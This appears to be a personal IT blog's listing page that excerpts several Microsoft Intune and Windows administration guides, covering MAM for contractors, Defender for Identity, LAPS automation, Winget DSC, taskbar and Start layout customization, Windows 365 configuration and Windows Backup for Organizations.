michaelsendpoint.com

MAM for Contractors | Intune

Mon, 09 Mar 2026 20:31:41 GMT

👋 Introduction

When hiring contractors and granting them access to sensitive resources, such as internal data, SaaS platforms or administrative portals, it is critical to enforce security controls at the application layer, because direct management of the device is not possible. Implementing Microsoft Edge for Business alongside Mobile Application Management (MAM) is an effective way to safeguard your organisation's data accessed through browsers on Windows.

Microsoft has announced the launch of a Public Preview (March 2026) feature that will allow browser-based protection policies to be applied to the work profile of Edge for Business, even when the device is not managed directly. This approach ensures data boundaries are maintained while respecting the ownership of devices belonging to other organisations.

⚙️ Configuration

Mobile Threat Defense (MTD)

The Microsoft Intune MTD connector links Intune with third-party vendors to provide cross-platform threat intelligence. For unmanaged devices, MAM can use these connectors to assess device health without an agent present on the machine.

The connector will only gather data from MAM-enrolled users. To stop transmission, users can sign out of the protected app or the admin can remove the MTD connector from Intune.

The data sent through the connector includes:

User, app and device identifiers
Last update timestamp
A predefined health state
- Secured: Zero-tolerance for threats
- Low: Allows only low-level threats
- Medium: Allows low or medium level threats
- High: Allows all threat levels (should only be used for test purposes)

Configure the MTD Connector

Open the Intune admin portal -> Tenant administration -> Connectors and tokens -> Mobile Threat Defense and click ➕ Create.
Now select Windows Security Center in the Select the Mobile Threat Defense connector to setup field and click Create.

INFO

The status will show 🔁 Not set up until you enroll the first MAM user.

App Configuration policy

This will set up the behaviour of the Edge work profile and how we want the app to interact with the user. Following you will find my best practices:

Open the Intune admin portal -> Apps -> Manage apps -> Configuration and click ➕ Create -> Managed Apps.
Enter a Name, Description and click Select public apps.
Now select Microsoft Edge with the Windows platform, click Select and Next.

Now add the following settings from the Settings catalog.

Settings Catalog

Defender for Identity | Security

Mon, 23 Feb 2026 22:01:13 GMT

👋 Introduction

Microsoft Defender for Identity (MDI) (formerly Azure Advanced Threat Protection / Azure ATP) is a cloud-based security solution that helps you protect and monitor identities across your organization. It brings together identity data within the Microsoft Defender portal from both on-premises and cloud identities. It helps you by bringing together your identity signals with all the other security signals you get and shows you a full picture of these threats. In addition it extends the automated attack disruption features of Microsoft Defender to your on-premises identities.

Licenses

Defender for Identity is already included in a lot of M365 plans, but also available as a standalone license.

Enterprise Mobility + Security E5 (EMS E5/A5)
Microsoft 365 E5 (Microsoft E5/A5/G5)
Microsoft 365 E5/A5/G5/F5* Security
Microsoft 365 F5 Security + Compliance*
Standalone Defender for Identity license

How does it work?

Outside the Cloud, Defender for Identity works by utilizing a sensor on your AD DS (Domain Services / Domain Controller), AD FS (Federation Service) and AD CS (Certificate Service) Servers. The sensor monitors for threats, analyzes network traffic and collects event logs. It sends this data to the cloud service, which combines and displays the findings together with the other security signals in the Microsoft Defender portal.

Over the past years, Microsoft has integrated Defender for Identity into the unified Microsoft Defender XDR portal. This provides a central location for viewing security alerts and incidents, making it easier to respond across different areas. This is because attackers do not operate within boundaries, whether these be identity-based, device-based or otherwise.

Also there are two versions of the Defender for Identity sensor (2.x & 3.x) at the moment because of the efforts from Microsoft to make the onboarding, offboarding and operation easier by integrating it into the Defender for Endpoint and Operating System from Windows Server 2019 onwards. That also means that the new sensor uses the same connectivity as Defender for Endpoint and you don't have to open additional ports on your firewalls. But the new sensor is still in Development at the moment (February 2026) and does not fully support all features of the previous version yet.

3rd Party Integrations

You can use a third-party identity or Privileged Access Management (PAM) provider with Microsoft Defender for Identity.

You have the option to integrate Okta using the built-in integration. Microsoft provides comprehensive documentation, including a step-by-step guide on how to configure the integration (see How Microsoft Defender for Identity protects your Okta accounts).

If you use a third-party PAM solution, Microsoft also offers built-in integrations with several providers like CyberArk, BeyondTrust and Delinea. Documentation on supported PAM providers is available directly in the Microsoft Defender portal -> Investigation & response -> Partner catalog -> Technology partners, where you can find detailed information and direct links. You can also access this information here: Integrate Defender for Identity with PAM services.

Sizing

MDI sensors require a minimum amount of resources to run properly. If the server doesn't have the required resources, domain controller performance shouldn't be affected, but the Defender for Identity sensor might not work as expected.

You can use the MDI sizing tool to check if you got the required resources. Download it here.

Copy the tool to your domain controller and run it.

The tool will run and check if your server is supported based on the Busy Packets/Second value. This is calculated based on the 15 busiest minutes over a 24-hour period. While the tool runs, it creates and updates an XMLS report. As soon as you are ready, stop the tool with CTRL + C and open the report to check the results.

A few common results are:

Result	Description
Yes	The sensor is supported.
Yes, but additional resources required	Add missing resources.
Maybe	Current Busy Packets/sec may be higher than average.
Maybe, but additional resources required	Add specified resources or if Busy Packets/sec exceeds 60K.
No	Sensor not supported.
Missing OS Data	Unable to read OS data.
Missing Traffic Data	Unable to read traffic data.
Missing RAM data	Unable to read RAM data.
Missing core data	Unable to read core data.

MDI sensor sizing estimation

Self-Service Local Admin Password (LAPS) automation | Microsoft 365

Mon, 23 Feb 2026 21:57:47 GMT

👋 Introduction

The Problem:

Giving workers local administrator rights on their devices is a common requirement in many organizations. However, managing and securing these local administrator accounts can be challenging.

LAPS (Local Administrator Password Solution) is a tool designed for this purpose, but it is intended for administrators, not end users. As a result, it is effectively unusable for end users. At present, it is not possible to restrict which LAPS passwords a user with the appropriate Entra permissions can read, without creating admin units. But this is not a viable solution in this case, as it would require creating a unit per device, which would quickly exceed Entra’s administrative unit limits. As a result, any user who has read access can view the LAPS passwords for all devices.

This is not great. If you do not want to grant end users access to the Entra portal and allowing them to read all LAPS passwords, this is a non-starter.

My approach:

If you want to take advantage of the built-in LAPS functionality, do not want to use Endpoint Privilege Management (EPM) or do not have the required license, another approach is needed. To address this, I cooked up an automation that allows users to request their LAPS password without accessing the Entra portal and without granting them any permissions to read LAPS passwords themselves.

To do that we need the following components:

a custom role for accessing LAPS passwords
an Azure Automation Account to run custom PowerShell code
an enduser with an exchange mailbox

What is Azure Automation?

Winget DSC | Powershell

Mon, 23 Feb 2026 21:57:47 GMT

Winget DSC (Desired State Configuration)

👋 Introduction

Desired State Configuration (DSC) is a feature that automatically keeps IT infrastructure in a defined, consistent desired state It provides drift control by ensuring that systems automatically conform to this defined state, maintaining consistency and correcting any deviations.

DSC can do stuff like keeping your applications up to date, ensuring services are running, applying configuration settings and managing files. These tasks help maintain consistency, security, and functionality across user devices with minimal manual intervention.

There are different versions and different implementations of DSC. Winget uses Powershell DSC 3.0 for the configure and Microsoft DSC 3.0 the new dscv3 command. These two implementations have different capabilities and purposes.

configure - Is build on top of Powershell DSC 3.0 and is used to configure your machine.

dscv3 - Is build on top of Microsoft DSC 3.0 and supports at the moment exporting the configuration of the current device, including Windows Settings, packages from configured WinGet sources and package settings from DSC v3 enabled packages.

TIP

If you want to know more about the differences in the underlying technologies, you can find more information here.

🚀 Start using WinGet & DSC

Winget configure

What can be configured?

Configuration Settings
- Windows Explorer
- Dark Mode
- Taskbar
Software Installation
- Winget
- MS Store
- Software Configurations
Powershell Scripts
- Whatever you can think of

How to create a WinGet DSC configuration file

Create a text file and save it with a .dsc.yaml extension.
Open the file in a text editor and add content in the following format:
1. Schema: Defines the structure and properties required to configure a resource.
2. Properties: Defines the properties of a resource.
3. Assertions: Sets the conditions that must be met for a configuration to apply.
4. Resources: Defines the resources that are being configured.
5. Configuration Version: Sets the version of the configuration.

Example Code:

yaml

# yaml-language-server: $schema=https://aka.ms/configuration-dsc-schema/0.2

properties:
  assertions:
    - resource: Microsoft.Windows.Developer/OsVersion
      directives:
        description: Verify min OS version requirement Windows 11 Version 23H2
        allowPrerelease: true
      settings:
        MinVersion: '10.0.22631'
  resources:
    - resource: Microsoft.WindowsSandbox.DSC/WindowsSandbox
      directives:
        description: Create Windows Sandbox
        allowPrerelease: true
      settings:
        Ensure: Present # Ensure the resource is present
        LogonCommand: >
          # Define a command to run when the sandbox is started
  configurationVersion: 0.2.0

How to apply a configuration file

Open a PowerShell window and use the following code to apply the configuration file:

powershell

winget configure [filename].dsc.yaml

INFO

Your configuration file does not have to be local, it can be a hosted file. This would allow you to apply a configuration file remotely via intune or other means.

Example of the Microsoft Sandbox WinGet DSC configuration file executing:

WinGet DSC configuration possibilities example

Taskbar and Start Menu customization | Intune

Thu, 08 Jan 2026 15:25:16 GMT

🧑‍🔧 Customize the Windows 11 Taskbar

Customising the Windows 11 Taskbar allows you to personalise the user experience by pinning frequently used applications and removing unnecessary shortcuts. This section provides instructions on creating a Taskbar configuration XML file and testing it in a controlled environment. To make things easier and avoid having to create a complicated XML file, I've created a script that gives you a handy list of your apps to select and then creates the XML file for you.

Creating the Taskbar settings XML

Configure the taskbar with Microsoft Intune or GPO by automatically creating the XML file using the script I created from the PSGallery.

powershell

Install-Script -Name New-TaskbarCustomizationXML

Or you Download the script directly from my Github.

As soon as you Start the Script with the command below, a Windows Explorer Dialog opens and you can select a Folder to save your Script.

powershell

New-TaskbarCustomizationXML

Next, the script opens a list of your current taskbar shortcuts. Select the shortcuts you want to add to the XML file.

TIP

Hold Strg or Shift to add multiple items.

The script opens a list of all your installed packages (programs). Select the ones you want to add to the XML file.

TIP

If you select nothing in either list, the final XML will automatically add the nessecarry lines for a taskbar icon removal.

NEW Nov 2025 Next you will be asked if you want any of the Pins not to come back, if the user unpins them.

INFO

Any pins set up via policy settings come back when the next policy update cycle happens, even if you unpin them.
Pins that have the new attribute (PinGeneration) can be unpinned from the taskbar and won't be repinned during the next policy update cycle.

Starting with Windows 11 Insider Preview Build 26200.5722 (Dev Channel) and 26120.5722 (Beta Channel), taskbar pin configurations deployed via policy are applied instantly, without requiring the user to sign out and sign back in.

Pressing OK will create a new folder called TaskBar_XML in the folder you selected. You can then find your new XML file in this folder.

XML file example from Microsoft:

xml

<?xml version="1.0" encoding="utf-8"?>
<LayoutModificationTemplate
    xmlns="http://schemas.microsoft.com/Start/2014/LayoutModification"
    xmlns:defaultlayout="http://schemas.microsoft.com/Start/2014/FullDefaultLayout"
    xmlns:start="http://schemas.microsoft.com/Start/2014/StartLayout"
    xmlns:taskbar="http://schemas.microsoft.com/Start/2014/TaskbarLayout"
    Version="1">
  <CustomTaskbarLayoutCollection>
    <defaultlayout:TaskbarLayout>
      <taskbar:TaskbarPinList>
        <!-- your pins list goes here -->
    </defaultlayout:TaskbarLayout>
 </CustomTaskbarLayoutCollection>
</LayoutModificationTemplate>

INFO

You can find more Information on Taskbar customization in this Microsoft Learn Article: Configure the Windows taskbar.

Test Taskbar XML

To test the XML file quickly and set up Start Pins, follow these instructions:

Start the Windows Sandbox, any other VM or your own PC. If you're using a Virtual Machine, copy the XML file onto it.

INFO

You can find out how to install the Windows Sandbox here.

Open the local Group Policy Editor (gpedit.msc) and go to Computer Configuration -> Administrative Templates -> Start Menu and Taskbar.
Next open Start Layout, select Enabled and enter the path of the XML file.
Finally click OK.

Now open a command prompt or powershell window and enter the following command.

powershell

gpupdate /force

When the command is completed, open the Taskmanager, scroll down to the Windows Explorer and select Restart.

INFO

Restarting the Windows Explorer service restarts the Taskbar aswell.

Taskbar before:

Taskbar after:

Deploy Taskbar XML

When deploying the Start Menu XML, please note that there is a slight oddity in Intune.
It is not possible to import the file directly; instead, the XML text must be copied and pasted into the text box.

INFO

You can find more Information on how to deploy the XML file with Intune or GPO in this Microsoft Learn Article: Deploy the taskbar configuration

Conclusion

By following the steps above, you can easily test and validate your Taskbar XML configuration in a controlled environment like Windows Sandbox or a virtual machine. This ensures that your customizations work as intended before deploying them to production systems.

NOTE

You can find the XML file I used here.

🧑‍🔧 Customize the Windows 11 Start layout

You can customise the Windows 11 Start layout to make it consistent and user-friendly by pinning essential apps and organising the Start menu. This section provides guidance on creating the JSON file and deploying it.

Microsoft provides a CMDlet to help you create the Start Menu JSON.
Open a Powershell Windows and use the code below:

powershell

Export-StartLayout -Path "C:\temp\LayoutModification.json"

JSON file example from Microsoft:

json

{
  "pinnedList": [
      { "desktopAppLink": "%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Edge.lnk" },
      { "packagedAppId": "windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel" },
      { "desktopAppLink": "%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\File Explorer.lnk" },
      { "desktopAppLink": "%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Windows PowerShell\\Windows PowerShell.lnk" },
      { "packagedAppId": "Microsoft.WindowsTerminal_8wekyb3d8bbwe!App" },
      { "packagedAppId": "Microsoft.Paint_8wekyb3d8bbwe!App" },
      { "packagedAppId": "Microsoft.Windows.Photos_8wekyb3d8bbwe!App" },
      { "packagedAppId": "MicrosoftCorporationII.QuickAssist_8wekyb3d8bbwe!App" },
      { "packagedAppId": "Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe!App" },
      { "packagedAppId": "Microsoft.SecHealthUI_8wekyb3d8bbwe!SecHealthUI" },
      { "packagedAppId": "Microsoft.OutlookForWindows_8wekyb3d8bbwe!Microsoft.OutlookforWindows"}
  ]
}

INFO

You can find more Information on Start Menu customization in this Microsoft Learn Article: Configure the Start menu.

Layout Modification Options

Key	Description
packagedAppID	Used for Universal Windows Platform (UWP) apps. To pin a UWP app, use the app's AUMID.
desktopAppID	Used for desktop apps. To pin a desktop app, use the app's AUMID. If the app doesn't have an AUMID, use the desktopAppLink instead.
desktopAppLink	Used for desktop apps that don't have an associated AUMID. To pin this type of app, use the path to the .lnk shortcut that points to the app.
secondaryTile	Used for Microsoft Edge pinned sites.

You'll find the setting for deploying the Start Menu Customisation in the Settings Catalog in Intune.
When you're deploying the Start Menu JSON, you can import the file into Intune.

Start Menu before:

Start Menu after (The user can`t remove the Start Menu items):

NOTE

You can't create multiple sections or customise the Start Menu in other ways like was possible in the past with the XML variant, unfortunately.

Conclusion

If you follow the steps above, you can easily customise the Start Menu using the JSON file, making sure that users have a consistent experience.

NOTE

You can find the JSON file I used here.

Windows 365 Configuration | Intune

Mon, 29 Dec 2025 14:37:37 GMT

Windows 365 Configuration

👋 Introduction

Windows 365 is Microsoft’s cloud-based Desktop-as-a-Service (DaaS) offering. It provides fully managed virtual PCs hosted in the cloud, which users can access from any device with an internet connection.

To learn more about what a Cloud PC or Windows 365 is or how it compares to other DaaS solutions, look at this article.

In the following guide I will go trough the configuration, provisioning and user experience of Windows 365.

To use Windows 365 Business, you only need to buy the license and assign it to a user in the M365 Admin Center -> Billing -> Licenses. You can not manage it and therefore no configuration of the Cloud PC itself is needed.

Network Requirements

The following URLs and Ports are needed to provision Cloud PCs and complete the Health Checks:

*.infra.windows365.microsoft.com
*.cmdagent.trafficmanager.net

Registration Endpoints

login.microsoftonline.com
login.live.com
enterpriseregistration.windows.net
global.azure-devices-provisioning.net (Ports 443, 5671 outbound)
Various hm-iot-in-prod & hm-iot-in-2/3/4-prod endpoints (Ports 443, 5671 outbound)

All endpoints use port 443 unless differnetly specified

Port 3389 is disabled by default on Windows 365 and is recommended to stay that way. Do not use this port to access the Cloud PC`s.

You can learn more about all current network requirement here.

📥 Provisioning

Windows 365 Enterprise, Frontline, Reserve and Link are managed through the Intune admin center.

If you got no licenses in your tenant, you can not start with the configuration.

To start provisioning Licenses you first need to buy some or start a trial. You can do that by going to the Microsoft 365 admin center and select Marketplace or if this is not shown in your side panel you open Billing and select Purchase services. There you can just search for the Windows 365 product you want and get it as a purchase or trial.

Now that you got the license you can start with the provisioning. For that you open Billing and select Licenses.

Click on the Windows 365 License in your list and select + Assign license either in the Users or Groups tab and assign it to the identity you want to access the Cloud PC with.

⚙️ Configuration

Prerequisites:

Access to the Intune admin portal
Entra roles: Global Administrator, Intune Administrator or Windows 365 Administrator

To set up Windows 365, there are four configuration areas where you can define settings:

Provisioning policies: Control how the Cloud PC is created and set up.
Custom images: Create and use a custom Windows image from an Azure Image Gallery for new Cloud PCs.
Azure network connection: Connect an Azure virtual network (VNet) for Cloud PC networking.
Settings: Manage user-related settings for Cloud PCs.

In addition you should set up a device group to better assign your policies.

First you open the Intune admin portal -> Devices -> Device onboarding -> Windows 365, where you can see the Overview of the current Windows 365 status and get started.

If you select the All Cloud PCs or All Cloud Apps tabs, you will get a list of all the current Cloud PCs and Remote Apps and there status.

Provisioning policies

To create a provisioning policy you select the Provisioning policy tab and click Create.
On the first page you enter the policy name, description and select the Cloud PC experience and type you need.
- Experience
  - Full Desktop
  - Remote App
- Type
  - Enterprise
  - Frontline
  - Reserve (So new it is not on the screenshot.)
Next you select the Join type details.
- Join type
  - Entra Join
  - Hybrid Entra Join
- Network
  - Microsoft hosted network
  - Azure network connection
- Entra single sign-on

Network connection

If you select Microsoft hosted network Microsoft will take care of the needed Network architecture. Additionally since December 2025 you can utilize a 3 tiered region level.

Geography level (Level 1): Selects all regions in the whole Geography.
Region group level (Level 2): Selects a specipic supgroup of that Geography, for data boundary requirements for example.
Region level (Level 3): Selects a specific region.

The Cloud PCs will then get provisioned only in the selected regions and you can also select your own custom selection of regions out of a Geography. You can also set your Region selection to auto. That means Microsoft automatically spreads your devices through the Geography dependend on the best availability. So that also means, if there is an outage in a Region your Cloud PCs will get automatically set up in another region, without you needing to do anything and new regions will automatically get utilized.

If you select Azure network connection Cloud PCs will use a prior set up Vnet from your Azure supscription that you connected through the Azure network connection tab. With this you got the complete control over the network infrastructure and can connect Cloud PCs to your existing environment, without going through the internet. This is mandatory for Hybrid Entra joined Cloud PCs.

If you select Frontline as License type you can additionally select if you want to utilize Dedicated or Shared mode.

INFO

Be aware that selecting Access only apps which run on a Cloud PC always means you run Windows 365 Frontline in Shared mode.

Then you click Next and select the Image type on the next page. You can select from a few Microsoft provided gallery images or use a Custom image you set up in the Custom image tab.

Now click Next again and you get to the Configuration tab. Here you can set the following:
- The Language the Cloud PC will use.
- A possible custom device naming template.
- If you want to use Autopilot device preperation. (This makes it easy to get the device directly set up the way you need it. With scripts and apps, ready for the user to log in.)
- If you want to utilize Windows Autopatch to automate Windows updates on your Cloud PCs.

Experience Sync

If you create a profile for a Windows 365 Frontline Cloud PC in shared mode, you can addtionally select the new Experience Sync option. This new Feature (November 2025) will act as a quasi FsLogix(What is FsLogix?) for your Cloud PCs. With this the Windows personalization, user settings, application settings and application data will be saved between sessions. This provides a better user experience, despite Frontline shared mode resetting the Cloud PC after logoff.

You can activate it in the Configuration settings and set the amount of storage you want to give each user for that.

After the configuration you click Next again, enter your Scope tags, set the Assignment to the device group you created and then Review + create it.

Custom images

To add a custom image to Windows 365 you go to the Intune admin portal -> Devices -> Device onboarding -> Windows 365, where you can open the Custom images tab.

When you then click Add, a flyout window opens where you can select the following:
- An image name.
- The version of your image (So you can see which image is used here and used in which Cloud PC. This gives you a better understanding of your image lifecycle.)
- The subscription where your image gallery is located.
- The source image you want to use.

After that you just add the image.

Azure network connection

To add a custom network connection to your Cloud PC, you need to meet a few requirements.

Requirements for Entra joined Cloud PCs:

Azure Virtual Network: Must be in the same region as the Windows 365 desktops.
Network Bandwidth: Make sure the network has enough bandwidth for your needs.
Subnet and IP Address Space: A subnet in the VNet with enough available IP addresses.

Additional requirements for Entra hybrid joined Cloud PCs:

DNS Resolution: The VNet must be able to resolve AD DNS records.
Domain Controller Access: The VNet must have network connectivity to a domain controller.

To add a custom network connection to Windows 365 you go to the Intune admin portal -> Devices -> Device onboarding -> Windows 365 and open the Azure network connection tab.
Here you can use + Create to add a network for Entra join or Entra hybrid join.

For an Entra join network you just enter a name and then select the VNet and Subnet from your existing subscriptions. For Entra hybrid join, you also need to add your domain info one tab later (The domain user needs to have the apropriate permissions to add devices).

After that you click Next, enter scope tags if needed and then create the connection.

This will now trigger a connection check that can take a few minutes to complete, to check if your connection is legit.

After the fact you can click on the Status and look at the checks that where performed. In the case of a failure, you can also find the problem in here.

INFO

You can add up to 50 network connections to your Windows 365 environment.

Settings

To add settings to your Cloud PC you go to the Intune admin portal -> Devices -> Device onboarding -> Windows 365 and open the Settings tab, where you can create Cloud PC configurations or User settings.

Cloud PC configuration

In the Cloud PC configurations you can turn on Copilot + PC AI features.

INFO

This feature will be set after the initial propvisioning of the cloud PC and needs at least a "8 vCPU / 32GB RAM / 256GB Storage" Machine.

It will take around 48 hours to activate and needs the Windows Insider Program at the moment. Learn more here.

Just add the Name and Description in the first tab, click Next and then in the Configuration settings tab, you enable the AI-enable features setting.
After that click Next again, enter Scope tags you need, create the assignment to a group of users and then Review + create the settings policy.

You will be able to verify if it worked in the Overview of your Cloud PC.

User settings

In the User settings you set up the behavior of the users that sign-in to your Cloud PCs.

INFO

These settings take effect at the moment of sign-in to the cloud PC. They have no effect on already signed-in users.

In addition, these settings have no effect on Frontline devies in shared mode.

First enter the name of your settings policy and then, you can set the following settings:
- Enable local admin: Elevated user to local admin on the Cloud PC.
- Enable users to reset their Cloud PCs: Enables a reset option in the Windows App, that lets the user reset / wipe and reprovision the Cloud PC (delets all user data and apps).
- Allow user to initiate restore service: Allows the user to restore the Cloud PC to any available backup.
- Frequency of restore-point service: Sets the time gap between restore points (4, 6, 12, 16 or 24 hours).
- Cross region disaster recovery configuration: Lets you protect Cloud PCs during regional outages (needs an additional license). You can select: None, Disaster Recovery Plus or Cross Region Disaster Recovery (Learn more here).

After that click Next, create the assignment to a group of users and then Review + create the user settings.

Windows App settings

The Windows App settings are a Preview feature where you can set the behaviour of the Windows App or Windows web portal for your users (Learn more here).

Like with the other settings you can enter a Name first and then on the second tab set the following settings:
- Enable users to reset their Cloud PCs: Enabling this shows the option for users to reprovision their Cloud PC.
- Allow users to initiate a Restore: Enabling this shows the option for users to initiate restores of their Cloud PC.

INFO

These settings will override the User settings, if they conflict.

Windows 365 Boot

Windows 365 Boot allows users to bypass the need to sign in to their physical device, enabling them to sign in directly to their Windows 365 Cloud PC after boot.

Authentication Methods

Authentication	Dedicated mode supported	Shared mode supported
Username/password	✅	✅
Windows Hello for Business	✅	❌
FIDO key	✅	✅
Convenience pin	❌	❌

You can start the guided setup directly from the Overview page in the Intune admin portal -> Devices -> Device onboarding -> Windows 365, where you find it at the bottom under Windows 365 Guides -> Windows 365 Boot.

The first page explains what Windows 365 Boot is and what will be configured in this profile. You just click Next to continue.

After that you come to the Basics tab, where you can set the following options:
- Device name template
- Name
- Description
- Shared PC mode / Dedicated PC mode

And you get the Information about the ressources this guided setup will create for you. Now click Next to continue.

In the Endpoint updates tab you set up the update behavior of the physical device, you use to access the Cloud PC. After that click Next to continue.

In the Settings tab you can set up the following options:
- VPN profile
- Wi-Fi profile
- OS language
- Security baseline (This is for the physical device, not the Cloud PC)
- Connection Timeout
- Personalization (Shared PC mode only)
  - Company name
  - Company logo URL
  - Lock screen Image URL

WARNING

If you select a VPN or Wi-Fi profile here, that is already assigned to all users or all devices, the guided setup will replace that assignment with the assignment from the guided setup.

Dedicated mode	Shared PC mode

If you then click Next you will come to the Assignments tab, where you can first choose a deivce group to assign the profile to and then decide if users (also which users) should still be able to access the local device or only the cloud PC. To learn more about restricting access to the local device look here.

When you now click Next again you come to the Review + create tab, where you will be informed again which ressources the guided setup will create.

Other Settings

There are a few other things you can set up or need to know regarding the configuration of Windows 365.

RBAC

First regarding automatic configurations.

If you connect Images or Network connections to your Windows 365 environment, the system will automatically set up the apropriate RBAC role asignments in your Azure ressources to give Windows 365 the permission it needs. But these Role assignment will not be removed automatically, if you delete the Image or Network connection again.

Configuration Settings

Secondly there are a lot of configurations you can set up to customize the Cloud PC experience even more. You can use the same controls you used for RDP connections in the past.

The following example demonstrates how to enable USB redirection. This allows the use of USB devices such as FIDO security keys.

To create a configuration you go to the Intune admin portal -> Devices -> Configuration, where you click create + Create -> + New Policy to create a new configuration.
Select Windows 10 and Lateras Platform and Settings catalog as Profile type and then click Create.
Enter a Name and Description for your profile and then click Next to continue.
If you now click on + Add settings you can search for the Do not allow supported Plug and Play device redirection setting, activate it and set it to Disabled.

Click Next again, enter Scope tags if needed, click Nextagain, set the Assignments to the Windows 365 device group you created at the start and then Review + create the settings profile.

Next we need to create the setting to allow redirection on the local device, that connects to the Cloud PC. You can create that manually in your local Group Policy Editor to test or also through Intune.

To create the setting through Intune follow the same steps as before and search for the setting Allow RDP redirection of other supported RemoteFX USB devices from this computer and set it to Enabled. To create the setting manually open the Group Policy Editor (just search for group policy in Windows) on your local device and navigate to Computer Configuration -> Administrative Templates -> Windows Components -> Remote Desktop Services -> Remote Desktop Connection Client -> RemoteFX USB Device Redirection and set the setting there.

Once both settings have taken effect and you have connected to your Windows 365 machine, an additional symbol will appear in the connection bar, allowing you to activate or deactivate individual USB devices.

🗄️ Windows 365 Reserve

Windows 365 Reserve lets organizations give employees up to 10 days of Cloud PC access per year with an annual license. Cloud PCs are set up only when needed, what is cheaper and simpler then keeping physical loaner devices around and ship them through the lands.

There are a few important things to understand about Windows 365 Reserve licensing, as these will impact whether it is a good fit for your needs.

First, Windows 365 Reserve licenses must be purchased through Microsoft Sales and can not be gotten directly through the Microsoft Admin Center. The licenses apply at the tenant level and are not assigned in the Microsoft 365 admin center. Instead, they are applied when you create provisioning policies in Intune and assign those policies to a user group.

To cover users with Windows 365 Reserve, each user must already have the required base licenses, either standalone or as part of a bundle:

Windows 11 Enterprise or Windows 10 Enterprise
Microsoft Intune
Microsoft Entra ID P1

The cost for Windows 365 Reserve is 20 $ per user per year (November 2025).

A few important additional points:

Microsoft recommends purchasing one Windows 365 Reserve license for every user you want to cover
Reserve licenses cannot be shared or pooled across users
After a Windows 365 Reserve license is assigned through a provisioning policy, the user’s Cloud PC can be provisioned only after a seven-day waiting period.

So what that all means in practice is the following:

You contact you Microsoft sales rep and buy the needed amount of Windows 365 Reserve licenses.
These will then be provisioned to your tenant and visible in the Microsoft 365 admin center.
Now you create a user group with the users that you want to cover (should be the amount of licenses you bought).
Then you create a provisoning policy for Windows 365 in Intune and select Reserve as License type.
In the Assignment tab of the provisioning policy you select the user group you created.
When you then click on the provisioning policy, you will see all the users in the Cloud PC users tab.
You now wait 7 days.
After you can go back to the provisioning policy, click on the user and then click Provision.
Now the Reserve Cloud PC will be ready in now time for the user.

If you want to learn more about Windows 365 Reserve click here.
If you want learn more about the licensing click here.

My Opinion

In theory, Windows 365 Reserve is a great product, but the convoluted licensing process and the hoops you have to jump through to provision it make it basically unusable for most companies. The hoops are clearly only there to prevent you from sharing licences across users or giving them to short-term personnel, such as contractors.

But this is exactly the main use case, in my opinion! I want a pool of reserve licences so that I always have a cloud PC on hand in case a physical device breaks. However, licensing basically my whole company or creating a two-class system of haves and have-nots is not realistic. I would still need physical loaner devices, so the whole point of Windows 365 Reserve would be lost.

So, I think Microsoft will test the waters again here, and hopefully reshape the licensing model in the end to give this great idea a chance to succeed.

⭐ User Experience

To access your Cloud PC there are multiple options. Following you find an Access Matrix where you find which access method is available for which license type and then a Feature Matrix where you find which features are available on which client.

Access Matrix

Cloud PC | Windows 365 | Virtualization

Thu, 18 Dec 2025 14:14:51 GMT

☁️ What is a Cloud PC?

A Cloud PC is a virtual computer hosted in the cloud. It allows users to access their desktop environment and applications from any device with an internet connection. Because the computing resources are managed remotely, organizations can adjust capacity as needed, which supports flexibility and scalability. This approach is particularly useful for remote work, as it enables consistent access to files and applications from anywhere.

Examples of Cloud PC services:

Microsoft Windows 365
Microsoft Azure Virtual Desktop
Amazon WorkSpaces
Google Cloud's Virtual Desktops

🧑‍💻 What is windows 365?

Use cases

Security: You can keep your data on your own network, stay secure and compliant, reduce risk and still support remote work.
Disaster Recovery: Quickly set up a secure work environment in case of compromise.
Bring-yor-own-Device: Enable a secure and consistent environment without a physical devices.
Short-Term Staff / Contractors: Provide secure and compliant access for temporary staff while reducing onboarding and offboarding effort.
Performance spikes: Reduce the need for big, rarely used, local capacity and give demanding workloads the power they need without impacting the rest of your environment.
Shared Devices: Frontline and frontline-shared licenses offer a cost-effective way to provide frontline and shift workers with their own desktop environment, eliminating the compliance and credential hassle associated with shared accounts.
Mergers & Acquisitions: Spin-up capacity and give access to new useres quickly, without loosing security or compliance.

Windows 365 Plans

Windows 365 Business: For businesses with up to 300 users, this is a fully Microsoft-managed Cloud PC solution with no management options.
Windows 365 Enterprise: Microsoft-managed Cloud PC solution with management options through Intune.
Windows 365 Government: Microsoft-managed Cloud PC solution for the US government with specific security and compliance requirements.
Windows 365 Frontline: This license offers two options: dedicated desktop access for up to three users (one at a time per license) or a shared mode providing non-persistent machines to an unlimited number of users, also one at a time.
Windows 365 Reserve: Microsoft-managed Cloud PC solution used as supstitude for an unavailable device or short-term access up to 10 days per user per year.

INFO

Classifications as seen on the Windows 365 Homepage:

Windows 365 Basic - 2 vCPU / 4 GB RAM / 128 GB Storage (Desktop version of Teams (only Chat and audio calls))
Windows 365 Standard - 2 vCPU / 8 GB RAM / 128 GB Storage (Desktop version of Teams)
Windows 365 Premium - 4 vCPU / 16 GB RAM / 128 GB Storage (supports Visual Studio, Power BI and Dynamics 365)

These plans are not licenses, but examples of Cloud PC sizes. There are actually only four Windows 365 licenses: Business, Enterprise, Frontline and Reserve (Government is irrelevant for most).

Available Sizes

Windows Backup for Organizations | Windows Client | Windows

Thu, 11 Dec 2025 00:51:28 GMT

👋 Introduction

Windows Backup for Organizations is a business-class feature that makes it easier to refresh and upgrade devices. It makes sure that users have the same experience with their Windows settings and Store apps. It does this by securely synchronising settings every 8 days and offering a seamless restore process during OOBE (Out-Of-Box Experience). This feature is designed to help you transition to a cloud-first device approach.

Reduce migration overhead: Streamline Windows 10 to Windows 11 transitions
Minimize user disruption: Minimize downtime during device changes
Strengthen resilience: Confidently reset devices with backup & recovery
Reduce IT efforts: Users restores preferred settings independently

INFO

The complete feature is disabled by default and needs to be enabled by the admin.
Specifically the restore setting applies tenant-wide and is either disabled or enabled. But restore will only be available if the user made at least one backup before.

So no reason to worry about turning it on, even if you want to pilot first. Without the backup policy, users won`t see the restore option.

Requirements

Backup
- Windows 10 22H2
- Windows 11 22H2 and later
- Must be Microsoft Entra joined or Microsoft Entra hybrid joined
Restore
- Windows 11 22H2 and later
- The user needs at least one backup
